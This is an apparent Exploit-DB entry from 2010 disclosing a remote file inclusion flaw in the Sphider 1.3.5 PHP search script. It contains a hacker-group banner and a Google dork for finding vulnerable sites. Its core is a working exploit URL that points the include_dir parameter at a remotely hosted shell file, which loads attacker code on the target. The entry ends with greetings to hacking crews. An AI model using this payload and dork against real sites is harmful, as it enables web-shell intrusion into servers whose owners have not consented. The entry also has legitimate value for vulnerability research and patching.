sphider 1.3.5 - Remote File Inclusion Vulnerability

2010-07-09T00:00:00
ID EDB-ID:14294
Type exploitdb
Reporter Li0n-PaL
Modified 2010-07-09T00:00:00

Description

sphider v1.3.5 Remote File Inclusion Vulnerability. Webapps exploit for php platform

                                        
                                            --##----------##------######--------------------------------########----------------##--------|
--##----------------##------##------------------------------##------##--------------##--------|
--##----------##----##------##----##--####------------------##------##--######------##--------|
--##----------##----##------##----####----##----------------##------##--------##----##--------|
--##----------##----##------##----##------##----########----########------######----##--------|
--##----------##----##------##----##------##----------------##----------##----##----##--------|
--##----------##----##------##----##------##----Li0n-PaL----##----------##----##----##--------|
--##########--##------######------##------##-sTiLL Str1k3z--##------------########--##########|
--------------------------------------------------y0u------------------------------------------|
====================================================================================+
[~] #sphider Remote File inclusion  
====================================================================================+|
                                                                                     |
                              Li0n-PaL sTiLL Str1k3z y0u!!                          |
                                                                                     |   
+===================================================================================+|
[?] sphider Remote File inclusion                                                  |
+===================================================================================+
    [?] My h0m3:              [http://HaCkTeCh.Org/cc & Pal-Li0n.som           ]
    [?] F0r 4sk:              [ F5w@hotmail.com                                ]
    [?] 5cr1p7:               [ sphider                                        ]
    [?] h0m3 5cr1p7           [ http://www.sphider.eu                          ]
    [?] L4nguage:             [ PHP                                            ]
    [?] F0und3r:              [ Li0n-PaL                                       ]      
    [?] D0rK   :              [ Powered by Sphider                             ]
===[ Expl0it  ]===

RFI #~

  http://localhost/search/?include_dir=[http://localhost/shell.txt???]


Good luCk o_O

---------------------------------------------------------

[?] Gr44tz to:[ Pal-Li0n-[PaL-Li0ns.com]Red-D3v1L-ShaDow-D3v1L-j0rd4n14n.r1z[sec-r1z.com]-Sas-TerrOrisT-Cold z3ro-zAx-SarBot511-Devil Fucker-
Storm-HcJ-ViRuSMaN-VirUs_Hima-PaL-D3v1L-Mr.Safa7-Evil-Cod3r [v4-team]-h3ll c0d3-Mahmoud SQL[Team-SQL.com]-D4rk-Mr.Sc0rpion-All
HacKTeacH.Org MeMbers & Gusts & CreW]


========================
./Li0n-PaL